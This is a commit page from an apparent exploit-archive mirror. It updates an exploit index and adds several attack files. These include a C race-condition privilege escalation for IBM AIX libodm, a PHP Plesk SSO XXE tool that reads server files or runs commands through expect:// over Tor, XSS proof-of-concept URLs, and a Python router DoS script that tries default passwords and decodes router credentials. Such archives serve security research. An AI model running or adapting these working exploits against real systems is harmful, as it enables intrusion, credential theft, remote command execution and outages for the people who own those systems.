bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_14_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-14 04:38:32 +00:00
parent e662f4d577
commit 8c4a59c50c
27 changed files with 1162 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

42
files.csv
View file

@ -13271,7 +13271,7 @@ id,file,description,date,author,platform,type,port
15309,platforms/php/webapps/15309.txt,"DBHcms 1.1.4 - SQL Injection Vulnerability",2010-10-24,ZonTa,php,webapps,0
15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version)",2010-10-25,"Mighty-D and 7eK",windows,local,0
15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0
15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0
15314,platforms/arm/shellcode/15314.S,"ARM Bindshell port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15315,platforms/arm/shellcode/15315.S,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15316,platforms/arm/shellcode/15316.S,"ARM Loader Port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
@ -16215,7 +16215,7 @@ id,file,description,date,author,platform,type,port
18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,metasploit,windows,local,0
18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0
18783,platforms/linux/local/18783.txt,"mount.cifs chdir() Arbitrary root File Identification",2012-04-25,Sha0,linux,local,0
18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0
18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0
18787,platforms/php/webapps/18787.txt,"Wordpress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0
18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0
18791,platforms/php/webapps/18791.txt,"Wordpress 3.3.1 - Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0
@ -21564,7 +21564,7 @@ id,file,description,date,author,platform,type,port
24402,platforms/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 HTTP Authentication Bypass",2004-08-23,bashis,cgi,webapps,0
24403,platforms/php/webapps/24403.txt,"EGroupWare 1.0 Calendar Module date Parameter XSS",2004-08-23,"Joxean Koret",php,webapps,0
24404,platforms/windows/remote/24404.txt,"Gadu-Gadu 6.0 File Download Filename Obfuscation Weakness",2004-08-23,"Bartosz Kwitkowski",windows,remote,0
24405,platforms/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 Login_name Parameter Cross-Site Scripting Vulnerability",2004-08-24,sourvivor,php,webapps,0
24405,platforms/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 - Login_name Parameter Cross-Site Scripting Vulnerability",2004-08-24,sourvivor,php,webapps,0
24406,platforms/linux/local/24406.txt,"GNU a2ps 4.13 File Name Command Execution Vulnerability",2004-08-24,"Rudolf Polzer",linux,local,0
24407,platforms/windows/remote/24407.txt,"Microsoft Internet Explorer 6.0 Resource Detection Weakness",2004-08-24,"GreyMagic Software",windows,remote,0
24408,platforms/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x Directory Traversal Vulnerability",2004-08-24,"Jerome Athias",cgi,webapps,0
@ -23072,7 +23072,7 @@ id,file,description,date,author,platform,type,port
25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 User.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 Thread.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 Search.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25986,platforms/php/remote/25986.txt,"Plesk Apache Zeroday Remote Exploit",2013-06-05,kingcope,php,remote,0
25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Zeroday Remote Exploit",2013-06-05,kingcope,php,remote,0
25987,platforms/hardware/remote/25987.txt,"Xpient Cash Drawer Operation Vulnerability",2013-06-05,"Core Security",hardware,remote,0
25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 MOD_ORADAV Access Control Vulnerability",2003-02-13,"David Litchfield",multiple,remote,0
25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow Vulnerability",2005-07-15,"Leon Juranic",windows,remote,0
@ -25648,7 +25648,7 @@ id,file,description,date,author,platform,type,port
28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 Information Disclosure Vulnerability",2006-09-22,"Patrick Webster",php,webapps,0
28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 Vendors.PHP Directory Traversal Vulnerability",2006-09-22,"James Bercegay",php,webapps,0
28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0
28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 Filemanager.PHP Directory Traversal Vulnerability",2006-09-22,GuanYu,php,webapps,0
28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - Filemanager.PHP Directory Traversal Vulnerability",2006-09-22,GuanYu,php,webapps,0
28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0
28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0
28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 (.wav) - Crash PoC",2013-09-30,xboz,windows,dos,0
@ -26006,8 +26006,8 @@ id,file,description,date,author,platform,type,port
29014,platforms/asp/webapps/29014.txt,"Car Site Manager csm/asp/listings.asp Multiple Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0
29015,platforms/asp/webapps/29015.txt,"Car Site Manager csm/asp/detail.asp p Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0
29016,platforms/asp/webapps/29016.txt,"Car Site Manager csm/asp/listings.asp Multiple Parameter XSS",2006-11-14,"laurent gaffie",asp,webapps,0
29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 get_password.php XSS",2006-11-14,"David Vieira-Kurz",php,webapps,0
29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 login_up.php3 XSS",2006-11-14,"David Vieira-Kurz",php,webapps,0
29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - get_password.php XSS",2006-11-14,"David Vieira-Kurz",php,webapps,0
29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 XSS",2006-11-14,"David Vieira-Kurz",php,webapps,0
29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0
29020,platforms/php/webapps/29020.txt,"Quick Paypal Payments 3.0 - Presistant XSS (0day)",2013-10-17,Zy0d0x,php,webapps,80
29021,platforms/php/webapps/29021.txt,"Wordpress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80
@ -27407,7 +27407,7 @@ id,file,description,date,author,platform,type,port
30574,platforms/multiple/dos/30574.txt,"CellFactor Revolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",multiple,dos,0
30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 forum_forum.php id Parameter XSS",2007-09-12,Doz,php,webapps,0
30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 text_search_action.php search_string Parameter XSS",2007-09-12,Doz,php,webapps,0
30577,platforms/php/webapps/30577.txt,"SWSoft Plesk <= 8.2 login.php3 PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0
30577,platforms/php/webapps/30577.txt,"SWSoft Plesk <= 8.2 - login.php3 PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0
30578,platforms/linux/dos/30578.txt,"MPlayer 1.0 AVIHeader.C Heap Based Buffer Overflow Vulnerability",2007-09-12,"Code Audit Labs",linux,dos,0
30579,platforms/linux/dos/30579.txt,"Media Player Classic 6.4.9 Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0
30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0
@ -30340,6 +30340,7 @@ id,file,description,date,author,platform,type,port
33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0
33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass Vulnerability",2010-02-25,JIKO,php,webapps,0
33677,platforms/php/dos/33677.txt,"PHP <= 5.3.1 - LCG Entropy Security Vulnerability",2010-02-26,Rasmus,php,dos,0
33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 'wflogin.jsp' Cross Site Scripting Vulnerability",2010-02-26,"Yaniv Miron",jsp,webapps,0
33679,platforms/php/webapps/33679.txt,"TRUC 0.11 'login_reset_password_page.php' Cross Site Scripting Vulnerability",2010-02-28,snakespc,php,webapps,0
33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0
@ -30359,9 +30360,16 @@ id,file,description,date,author,platform,type,port
33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0
33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
33707,platforms/windows/remote/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service Vulnerability",2010-03-04,"Matthew Bergin",windows,remote,0
33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0
33709,platforms/php/webapps/33709.txt,"Natychmiast CMS Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-03-05,"Maciej Gojny",php,webapps,0
33710,platforms/windows/dos/33710.txt,"J. River Media Jukebox 12 - '.mp3' File Remote Heap Buffer Overflow Vulnerability",2010-03-04,"Gjoko Krstic",windows,dos,0
33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - '.mp3' File Buffer Overflow Vulnerability",2010-03-05,"Gjoko Krstic",windows,dos,0
33712,platforms/windows/remote/33712.txt,"VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow Vulnerability",2010-03-05,"Gjoko Krstic",windows,remote,0
33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow PoC",2014-06-11,"Gabor Seljan",windows,dos,0
33714,platforms/php/webapps/33714.txt,"SHOUTcast DNAS 2.2.1 - Stored XSS",2014-06-11,rob222,php,webapps,0
33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS 'pojam' Parameter Cross Site Scripting Vulnerability",2010-03-05,hacker@sr.gov.yu,asp,webapps,0
33716,platforms/php/webapps/33716.txt,"Saskia's Shopsystem 'id' Parameter Local File Include Vulnerability",2010-03-05,"cr4wl3r ",php,webapps,0
33717,platforms/multiple/webapps/33717.txt,"Six Apart Vox 'search' Page Cross Site Scripting Vulnerability",2010-03-05,Phenom,multiple,webapps,0
@ -30372,3 +30380,21 @@ id,file,description,date,author,platform,type,port
33722,platforms/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 'default.asp' Multiple Cross Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",asp,webapps,0
33723,platforms/php/webapps/33723.html,"KDPics 1.18 'admin/index.php' Authentication Bypass Vulnerability",2010-03-08,snakespc,php,webapps,0
33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 'page' Parameter SQL Injection Vulnerability",2010-03-07,"Andrés Gómez",php,webapps,0
33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
33726,platforms/php/webapps/33726.txt,"TikiWiki Versions Prior to 4.2 Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",php,webapps,0
33727,platforms/php/webapps/33727.txt,"wh-em.com upload 7.0 Insecure Cookie Authentication Bypass Vulnerability",2010-02-16,indoushka,php,webapps,0
33728,platforms/asp/webapps/33728.txt,"IBM ENOVIA SmarTeam 'LoginPage.aspx' Cross Site Scripting Vulnerability",2010-03-09,Lament,asp,webapps,0
33729,platforms/multiple/dos/33729.txt,"PostgreSQL <= 8.4.1 JOIN Hashtable Size Integer Overflow Denial Of Service Vulnerability",2014-06-13,"Bernt Marius Johnsen",multiple,dos,0
33730,platforms/asp/webapps/33730.txt,"Max Network Technology BBSMAX <= 4.2 'threadid' Parameter Cross-Site Scripting Vulnerability",2010-03-10,Liscker,asp,webapps,0
33731,platforms/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 Login SQL Injection Vulnerability",2010-03-10,"Yaniv Miron",multiple,webapps,0
33732,platforms/php/webapps/33732.txt,"60cycleCMS 'select.php' Multiple HTML Injection Vulnerabilities",2010-03-10,"pratul agrawal",php,webapps,0
33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 PNG File Handling Remote Denial of Service Vulnerability",2010-03-10,"Jonathan Salwan",windows,dos,0
33734,platforms/php/webapps/33734.txt,"DDL CMS 2.1 'blacklist.php' Cross Site Scripting Vulnerability",2010-03-10,ITSecTeam,php,webapps,0
33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0
33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE/XSS Injection Exploit",2014-06-13,"BLacK ZeRo",aix,webapps,0
33737,platforms/hardware/remote/33737.py,"ZTE and TP-Link RomPager - DoS Exploit",2014-06-13,"Osanda Malith",hardware,remote,0
33739,platforms/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33740,platforms/hardware/remote/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privileges Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0

Can't render this file because it is too large.

55
platforms/aix/local/33725.txt Executable file
View file

@ -0,0 +1,55 @@
Vulnerability title: Privilege Escalation in IBM AIX
CVE: CVE-2014-3977
Vendor: IBM
Product: AIX
Affected version: 6.1.8 and later
Fixed version: N/A
Reported by: Tim Brown
Details:
It has been identified that libodm allows privilege escalation via
arbitrary file writes with elevated privileges (utilising SetGID and
SetUID programs). The following will cause a new file /etc/pwned to be
created with permissions of rw-rw-rw:
#include <stdlib.h> #include <unistd.h> #include <stdio.h> int
pwnedflag; int main(int argc, char **argv) { pwnedflag = 0; umask(0); if
(fork()) { setenv("ODMERR", "1", 1); while (!pwnedflag) { if
(!access("/etc/pwned", F_OK)) { pwnedflag = 1; printf("Race
won...\r\n"); unsetenv("ODMERR"); exit(EXIT_SUCCESS); }
system("/usr/bin/at"); } } else { while (!pwnedflag) {
symlink("/etc/pwned", "ODMTRACE0"); if (!access("/etc/pwned", F_OK)) {
pwnedflag = 1; printf("Race won...\r\n"); exit(EXIT_SUCCESS); }
unlink("ODMTRACE0"); } } }
It is believed this is a side affect of CVE-2012-2179 being incorrectly
resolved. As understood, prior to CVE-2012-2179 being fixed, libodm
would simply open ODMTRACE0 and write to it assuming ODMERR=1. It is
believed that the fix that was applied was to check for the presence of
ODMTRACE0 and increment until no file was found. It is necessary to win
a time of check, time of use race condition by creating a symlink from
the ODMTRACE0 in the current working directory to the target file under
hoping that the link will be added after the check has been made that
ODMTRACE0 does not exist.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

105
platforms/aix/webapps/33736.php Executable file
View file

@ -0,0 +1,105 @@
# Exploit Title: Plesk SSO XXE injection (Old bug) Exploit #
# Date: 12 06 2014 #
# Exploit Author: z00 #
# Software Link: http://www.parallels.com/ #
# Version: 11.0.9 10.4.4 #
# Tested on: linux all #
<?php
/*
????????????????????????????
?______¶¶¶¶¶¶______________?
?____¶¶¶¶¶¶¶¶¶¶____________?
?___¶¶¶¶¶¶¶¶¶¶¶¶¶__________?
?__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________?
?_¶¶¶¶¶¶¶______¶¶¶_________?
?_¶¶¶¶¶¶________¶¶__¶¶_____?
?_¶¶¶¶¶¶____________¶¶¶____?
?_¶¶¶¶¶_____________¶¶¶¶¶¶_?
?_¶¶¶¶¶____________¶¶¶¶¶¶¶_?
?_¶¶¶¶¶___________¶¶¶¶¶¶¶__?
?_¶¶¶¶¶____________¶¶¶¶¶¶__?
?_¶¶¶¶¶_____________¶¶¶¶¶¶_?
?_¶¶¶¶¶¶____________¶¶¶_¶¶_?
?__¶¶¶¶¶¶______¶¶___¶¶_____?
?__¶¶¶¶¶¶¶____¶¶¶__________?
?___¶¶¶¶¶¶¶¶¶¶¶¶___________?
?____¶¶¶¶¶¶¶¶¶¶____________?
?_____¶¶¶¶¶¶¶______________?
????????????????????????????
Plesk SSO XXE injection (Old bug) Exploit
Coded by z00 (electrocode)
Twitter: electrocode
Not: Tor kurulu de?ilse proxy kismini kaldirin
Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss
Tüm ?slam Aleminin Beraat gecesi mubarek olsun dua edin:)
*/
function Gonder($domain,$komut,$method){
switch($method)
{
case "cmd":
$komut = "expect://$komut";
break;
case "read":
$komut = "file://$komut";
break;
default:
$komut = "file://$komut";
}
$adres = "https://$domain:8443/relay";
$paket = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><!DOCTYPE doc [ <!ENTITY xxe SYSTEM \"$komut\"> ] >
<samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"dff578c3049f5ba10223df820123fcccbc134e7520\" Version=\"2.0\" IssueInstant=\"2014-05-08T11:58:33Z\" Destination=\"javascript:prompt(document.domain,document.cookie)\"> <saml:Issuer>&xxe;</saml:Issuer> <samlp:Extensions> <UI><URL>&xxe;</URL></UI> </samlp:Extensions> <ds:Signature xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\"> <ds:SignedInfo><ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/> <ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/> <ds:Reference URI=\"#dff578c3049f5ba10223df820123fcccbc134e7520\"><ds:Transforms><ds:Transform Algorithm=\"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"/><ds:Transform
Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/></ds:Transforms><ds:DigestMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#sha1\"/><ds:DigestValue>5BWiyX9zvACGR5y+NB2wxuXJtJE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE=</ds:SignatureValue> </ds:Signature></samlp:AuthnRequest>";
$exploit = urlencode(base64_encode($paket));
$relaystate = gethostbyname($domain);
$relayadres = urlencode(base64_encode($relaystate));
$postlar = "SAMLRequest=$exploit&response_url=http://hax&RelayState=$relayadres&RefererScheme=https&RefererHost=https://$domain:8443&RefererPort=8443";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$adres);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_REFERER,$adres);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
//Proxy
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050");
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
//Proxy end
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS,$postlar );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$sonuc = curl_exec ($ch);
curl_close ($ch);
$gelenpaket = //"Paket: " . $postlar .
"Gonderilen Paket Boyutu: " . strlen($exploit)."\nRelayAdres: $relaystate\nSonuc: \r\n\r\n$sonuc \n";
return $gelenpaket;
}
if($argc < 4){
$kullanim = "########################################################################\n";
$kullanim .= "Plesk XXE Exploit Tool by z00\n";
$kullanim .= "Kullanimi : php $argv[0].php domain /etc/passwd read \n";
$kullanim .= "Example : php $argv[0].php adres cmd (only expect installed) method \n";
$kullanim .= "Kullanilabilir Methodlar : \ncmd (Expect kurulu ise)\nread (Dosya okur) \n";
$kullanim .= "########################################################################\r\n";
echo $kullanim;
} else {
$domain = $argv[1];
$komut = $argv[2];
$method = $argv[3];
echo Gonder($domain,$komut,$method);
}
?>

7
platforms/asp/webapps/33728.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38612/info
IBM ENOVIA SmarTeam is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/WebEditor/Authentication/LoginPage.aspx?ReturnUrl=%2fWebEditor%2fDefault.aspx&errMsg=User+is+locked.+Too+many+logon+attempts."><script>alert(&#039;XSS-By-Lament&#039;)</script>

9
platforms/asp/webapps/33730.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38630/info
Max Network Technology BBSMAX is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Max Network Technology BBSMAX 4.2 is vulnerable; other versions may also be affected.
http://www.example.com/forum1/post.aspx?action=reply&threadid="><script>alert(/liscker/);</script>

363
platforms/hardware/remote/33737.py Executable file
View file

@ -0,0 +1,363 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: ZTE and TP-Link RomPager DoS Exploit
# Date: 10-05-2014
# Server Version: RomPager/4.07 UPnP/1.0
# Tested Routers: ZTE ZXV10 W300
# TP-Link TD-W8901G
# TP-Link TD-W8101G
# TP-Link TD-8840G
# Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on: Kali Linux x86
#
# Notes: Please note this exploit may contain errors, and
# is provided "as it is". There is no guarantee
# that it will work on your target router(s), as
# the code may have to be adapted.
# This is to avoid script kiddie abuse as well.
#
# Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
# Author takes no responsibility for any kind of damage you cause.
#
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
#
# Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
# Video: https://www.youtube.com/watch?v=1fSECo2ewoo
# Dedicate to Nick Knight and Hood3dRob1n
#
# ./dos.py -i 192.168.1.1
import os
import re
import sys
import time
import urllib
import base64
import httplib
import urllib2
import requests
import optparse
import telnetlib
import subprocess
import collections
import unicodedata
class BitReader:
def __init__(self, bytes):
self._bits = collections.deque()
for byte in bytes:
byte = ord(byte)
for n in xrange(8):
self._bits.append(bool((byte >> (7-n)) & 1))
def getBit(self):
return self._bits.popleft()
def getBits(self, num):
res = 0
for i in xrange(num):
res += self.getBit() << num-1-i
return res
def getByte(self):
return self.getBits(8)
def __len__(self):
return len(self._bits)
class RingList:
def __init__(self, length):
self.__data__ = collections.deque()
self.__full__ = False
self.__max__ = length
def append(self, x):
if self.__full__:
self.__data__.popleft()
self.__data__.append(x)
if self.size() == self.__max__:
self.__full__ = True
def get(self):
return self.__data__
def size(self):
return len(self.__data__)
def maxsize(self):
return self.__max__
def __getitem__(self, n):
if n >= self.size():
return None
return self.__data__[n]
def filter_non_printable(str):
return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9])
def banner():
return '''
\t\t _/_/_/ _/_/_/
\t\t _/ _/ _/_/ _/
\t\t _/ _/ _/ _/ _/_/
\t\t _/ _/ _/ _/ _/
\t\t_/_/_/ _/_/ _/_/_/
'''
def dos(host, password):
while (1):
url = 'http://' +host+ '/Forms/tools_test_1'
parameters = {
'Test_PVC' : 'PVC0',
'PingIPAddr' : '\101'*2000,
'pingflag' : '1',
'trace_open_flag' : '0',
'InfoDisplay' : '+-+Info+-%0D%0A'
}
params = urllib.urlencode(parameters)
req = urllib2.Request(url, params)
base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '')
req.add_header("Authorization", "Basic %s" %base64string)
req.add_header("Content-type", "application/x-www-form-urlencoded")
req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm")
try:
print '[~] Sending Payload'
response = urllib2.urlopen(req, timeout=1)
sys.exit(0)
except:
flag = checkHost(host)
if flag == 0:
print '[+] The host is still up and running'
else:
print '[~] Success! The host is down'
sys.exit(0)
break
def checkHost(host):
if sys.platform == 'win32':
c = "ping -n 2 " + host
else:
c = "ping -c 2 " + host
try:
x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
return x
except:
pass
def checkServer(host):
connexion = httplib.HTTPConnection(host)
connexion.request("GET", "/status.html")
response = connexion.getresponse()
server = response.getheader("server")
connexion.close()
time.sleep(2)
if server == 'RomPager/4.07 UPnP/1.0':
return 0
else:
return 1
def checkPassword(host):
print '[+] Checking for default password'
defaultpass = 'admin'
tn = telnetlib.Telnet(host, 23, 4)
tn.read_until("Password: ")
tn.write(defaultpass + '\n')
time.sleep(2)
banner = tn.read_eager()
banner = regex(len(defaultpass)*r'.'+'\w+' , banner)
tn.write("exit\n")
tn.close()
time.sleep(4)
if banner == 'Copyright':
print '[+] Default password is being used'
dos(host, defaultpass)
else:
print '[!] Default Password is not being used'
while True:
msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower()
try:
if msg[0] == 'y':
password = decodePasswordLocal(host)
print '[*] Router password is: ' +password
dos(host, password)
break
if msg[0] == 'n':
password = decodePasswordRemote(host)
print '[*] Router password is: ' +password
dos(host, password)
break
else:
print '[!] Enter a valid choice'
except Exception, e:
print e
continue
